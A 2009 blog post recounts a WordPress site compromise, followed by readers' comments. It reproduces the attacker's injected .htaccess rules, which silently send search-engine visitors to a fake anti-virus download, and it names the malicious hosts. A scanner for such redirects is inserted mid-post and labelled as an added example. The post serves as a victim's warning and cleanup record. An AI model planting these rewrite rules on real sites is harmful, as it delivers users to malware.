Categories: How to, Internet, Malcolm Coles.

Website no longer hacked. Phew.

December 24, 2009 6 Comments

So I discovered today that my blog had been hacked - a word that covers a multitude of sins.

This hack seemed very clever:

  • If you typed a URL in directly, as I would to get to my own site, the site worked as normal.
  • If you visited the site from Google (or another search engine), you got redirected to another site, below, that tried to persuade you to download some supposed anti-virus software (which I'm sure was no such thing). I had no idea this was going on, as everything looked fine to me.

Not my site ...

It turns out that someone had edited the .htaccess file (a sort of configuration file for directories on your server) and made it look like this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://justrags.com/Swatches/1106/jpg.php [R,L]

So whenever anyone visited my site from one of those search engines, the server automatically redirected them to the justrags.com site - which has a file on it called jpg.php (not an image, but a file made to look like one to fool the site owner).

This, in turn, redirects you to thebestantispywarei.com (don't go there). That site tries to get you to install some alleged anti-virus software, which you definitely shouldn't.
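
A defender's check for the pattern described above, as an added example that is not part of the original post: it scans .htaccess text for RewriteRule lines that are gated on HTTP_REFERER conditions and redirect to an external host. The shortened sample rules, the placeholder host redirect.example and the own_hosts parameter are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a shortened copy of the injected rules, with a placeholder target host.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://redirect.example/landing.php [R,L]
"""

# Constructed sample: the kind of rules a stock WordPress .htaccess contains.
CLEAN = """\
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ANY_COND = re.compile(r"^\s*RewriteCond\b", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target, referer_patterns) for each RewriteRule that
    sends referer-matched requests to a host not listed in own_hosts."""
    findings, referers = [], []
    for no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            referers.append(cond.group(1))
            continue
        if ANY_COND.match(line):
            continue  # a non-referer condition of the same rule; keep collecting
        rule = RULE.match(line)
        if rule:
            host = urlparse(rule.group(1)).hostname  # None for local paths
            if referers and host and host.lower() not in own_hosts:
                findings.append((no, rule.group(1), list(referers)))
            referers = []  # conditions apply only to the next RewriteRule
    return findings

if __name__ == "__main__":
    for no, target, refs in find_referer_redirects(SAMPLE, own_hosts={"blog.example"}):
        print(f"line {no}: referer-gated redirect to {target} ({len(refs)} conditions)")
```

Running it over every .htaccess under the web root, with your own domains in own_hosts, would surface this kind of edit even though the site looks normal when you type the URL directly.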

It then turned out that my not-yet-finished company site had the same issue.

At first I thought that someone must have managed to get hold of all my passwords (the login details for the two sites are different - so one login can't access both).

But then I checked out some other sites on my shared server such as:

  • www.christchurchsouthcambs.org,
  • gingerbeer.co.uk,
  • possoft.co.uk and
  • bloomsburycleaning.co.uk.

They all had (have as I write this) the same issue - visits via Google were redirected, but you could get to the site by typing the URL directly.

My webhost hasn't given me a very good explanation of what has happened or what's going to stop it happening again - clearly the whole server has been compromised.

But, for now, I've recreated a normal .htaccess file for a WordPress blog - cobbling one together out of this and this. And the site is back working as normal - with new passwords for the server.

6 Comments »

  • Michael McGrath ( Ireland) says:

    Job Change : Welfare Tourist in Ireland !

    Glad you're back to normal - I was hacked so often that I went back to university , Trinity College Dublin, to a Computer Science degree there, mostly to learn how to keep my computer secure ! I can afford to as I changed years ago from Press Photographer to running my own studio.

    An idea I have is that maybe unemployed journalists could switch to freelance press photography for a living - you don't need to be a David Bailey to do press photography for a newspaper as it's the story your pictures tell, or how well they amplify a hot news item, rather than technical expertise , that counts , and a basic digital SLR from the Canon range can be used like a point-and-shoot for press work quite easily .

    They could accompany their freelance photo offerings with write-ups for publication - a much easier package to sell !

    Or even film those special articles they always planned to write with a HD camcorder as a television documentary !

    Another idea I have for an unemployed journalist is to team up with a cartoonist and work out the humorous satirical captions - there is always a massive demand for ingenious cartoons for publication .

    Or , failing everything, they could come and relax on the dole in Ireland while they write that novel -

    The Irish Dole is now three times as much as the dole in the U.K., with top rent allowances as well, so much so that word has travelled as far as the foothills of the Urals and we are witnessing a new phenomenon arriving on our shores from all over Europe this past few years, wittily dubbed " The Welfare Tourist " . They're having a ball :-)

    Personally I think that the journalist unions, especially the NUJ, should with government support, run Job Help days for unemployed journalists at centres all over the country .

    Yes, you've guessed, I was through the mill in a former incarnation and worked my way out of it all . Anything I can do, any fool can do better :-)

    Michael .

    • Michael McGrath says:

      Tons of Work out there for Unemployed Press Photographers , but you have to be really good, the Best :-)

      And for this job change you need to be one heck of a salesperson - Confirmation Photographer !

      ( This is how I earned the money to set up my own studio, took a few years ! )

      Basically , it consists of travelling around to all the Confirmation ceremonies of the Catholic Church and photographing the families and children with the bishop on the spot in the churchyard after Confirmations - get there beforehand as all the people enter the churchyard to take your bookings. Your rates have to be reasonable, say, two 10 x 8 colour enlargements for fifty quid ( sitting charge in studio for this can be as much as £300 , so you're doing the people a great favour ! ( We don't have the bishop as a prop in studio !!! )

      Get the Lists of Confirmations now from the Diocesan Office, they start around the end of January and go right up to June, almost every day of the week, you can have as many as 400 families involved per Confirmation, so you have to be fast on the trigger with those who book you, really you have to be able to " machine-gun" with a medium format camera, preferably a film camera as it's outdoor portraiture, scan them to digital afterwards , and, Wow, the results are stunning, have you ever scanned your medium format negs , it's fabulous ! ( this business is not for amateurs !!! ).

      Get receipt books printed, have a couple of 10 x 8 samples with you - and take full payment on the spot, but make those photos GOOD and you're really welcome back year in, year out, as you become known to be the Best :-)

      AND before you start the Confirmation Season, also contact the local newspaper editors in the area and you'll find that they'll be delighted to take the best Confo shots you send them - with byline that makes you well-known and trusted in every diocese you work as well :-)

      And you'll make a lot more money , in cash, on the spot than you'll ever earn as a freelance from any newspaper - sometimes you can plan it to cover two, even three, adjoining Confirmation ceremonies a day .

      ( Bring along the b/f or g/f to take the money, give change, write out receipts - and take the names and addresses of all your customers for postage of photographs to them, this can be a great way too to drum up future business, especially weddings, with all the families you do business with )

      Happy Xmas All !

      Michael .

  • Ian Miller says:

    Good to see you're back up and running :)

    So if your hosts aren't recognising they have a problem, are you going to stay with them?

  • Dave says:

    Glad you're back up and running - scary to think they were able to access the whole server though...

  • George says:

    Good to have you back in the safe world Malcolm! It's always scary when your blog is hacked.

    I've had a good experience with
    http://www.webfaction.co.uk even in the UK a their support is excellent plus they allow a huge amount of configuration over the server.

    Merry Christmas!

  • Ben says:

    My website got hacked by the same thing too. I got this back from my hosting company.

    This was an exploit on our server however we did actually think we removed it all :(

    The exploit came about as a tech was updating our IP Tables and CSF / BFD Firewalls and the security had to be shut down for 5 minutes.

    This was a few weeks back and we have since found a way to carry out maintenance without putting the server at jeopardy again.

    I'm sorry for the inconvenience caused.

    If there is anything else I can help with please do not hesitate to contact me.
